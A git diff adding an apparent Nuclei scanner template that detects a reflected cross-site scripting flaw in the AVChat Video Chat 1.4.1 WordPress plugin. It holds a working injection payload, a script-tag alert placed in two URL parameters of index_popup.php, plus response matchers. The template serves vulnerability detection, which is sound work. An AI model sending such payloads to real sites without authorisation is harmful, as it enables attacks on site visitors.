diff --git a/vulnerabilities/wordpress/wp-avchat-3-xss.yaml b/vulnerabilities/wordpress/wp-avchat-3-xss.yaml
new file mode 100644
index 0000000000..6a1d3c4ce9
--- /dev/null
+++ b/vulnerabilities/wordpress/wp-avchat-3-xss.yaml
@@ -0,0 +1,37 @@
+id: wp-avchat-3-xss
+
+info:
+ name: AVChat Video Chat 1.4.1 - index_popup.php Multiple Parameters Reflected XSS
+ author: DhiyaneshDK
+ severity: medium
+ description: |
+ The Community Lite Video Chat WordPress plugin was affected by an index_popup.php Multiple Parameters Reflected XSS security vulnerability.
+ reference:
+ - https://codevigilant.com/disclosure/wp-plugin-avchat-3-a3-cross-site-scripting-xss/
+ - https://wpscan.com/vulnerability/fce99c82-3958-4c17-88d3-6e8fa1a11e59
+ metadata:
+ verified: true
+ tags: wordpress,wp-plugin,xss,unauth
+
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-content/plugins/avchat-3/index_popup.php?movie_param=%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&FB_appId=FB_appId%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - 'FB_appId">"'
+ - 'swfobject.embedSWF(""'
+ part: body
+
+ - type: word
+ words:
+ - 'text/html'
+ part: header
+
+ - type: status
+ status:
+ - 200